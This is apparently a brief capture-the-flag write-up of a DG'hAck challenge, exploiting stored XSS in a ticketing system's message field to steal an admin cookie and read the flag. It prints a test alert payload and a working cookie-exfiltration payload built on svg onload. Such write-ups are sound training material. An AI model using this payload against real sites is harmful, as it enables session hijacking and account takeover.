The challenge presents itself as a ticketing system. After registering for an account, we are greeted with this page :

The ticketing system

Trying a classic xss (<script>alert(1)</script>) in the message field seems to work. We know that we have to login as an admin user, so let’s try stealing the cookies :

<svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\''.concat(btoa(document.cookie)).concat('\' />'))" />

After a few seconds, we get a request on our request bin, which when decoded gives us the admin cookie :


Logging in using that cookie reveals this todo-list :

The admin’s todo list

Which contains the flag: NoUserValidationIsADangerousPractice.

View all of the DG’hAck articles.